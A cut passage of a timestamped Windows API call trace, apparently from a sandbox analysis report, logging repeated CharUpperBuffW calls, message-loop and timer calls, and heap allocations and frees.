lpsz="A4300005D31") returned 0xb [0082.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.943] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.943] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.943] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.943] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.943] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.945] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.945] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.945] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.945] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.945] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.946] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.955] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.955] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.955] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.955] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.955] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.964] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.964] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.965] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.965] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.965] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.965] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.983] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.983] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.983] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.984] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.014] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.015] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.015] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.015] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.015] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.015] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.020] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.022] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.022] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.022] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.022] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.034] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.034] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.064] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.068] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.068] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.069] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.069] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.069] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.069] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.080] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.080] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.080] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.080] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.080] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.080] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.109] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.109] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.109] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.125] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.189] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.189] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.189] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.189] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.191] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.216] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.216] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.216] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.222] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.224] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.224] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.224] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.224] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.319] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.319] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.319] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.319] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.319] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.332] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.332] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.332] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.332] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.332] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.606] TranslateMessage (lpMsg=0x8cf488) returned 0 [0083.606] DispatchMessageW (lpMsg=0x8cf488) returned 0x0 [0083.606] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0083.606] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0083.606] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.607] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2700 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2718 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2958 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29b8 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2760 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2850 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a8a8 [0083.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2970 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2760 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29b8 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.607] lstrlenW (lpString="50") returned 2 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2970 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2958 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2718 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29b8 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2700 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29b8 | out: hHeap=0x2af0000) returned 1 [0083.608] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.608] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28e0 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26d0 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2790 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2988 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2700 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2718 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2880 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2838 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2850 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2700 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2718 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2880 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2988 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.609] lstrlenW (lpString="61") returned 2 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2838 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2790 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26d0 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2820 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2730 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a858 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28e0 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2730 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2820 | out: hHeap=0x2af0000) returned 1 [0083.609] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.609] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2970 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2748 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29a0 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2910 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2958 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2808 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2730 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27f0 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2718 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28f8 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2730 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2808 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27f0 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2718 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2958 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.610] lstrlenW (lpString="6E") returned 2 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28f8 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2910 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29a0 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2988 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2898 [0083.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2748 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2970 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2898 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2988 | out: hHeap=0x2af0000) returned 1 [0083.610] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.611] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2898 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2838 [0083.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 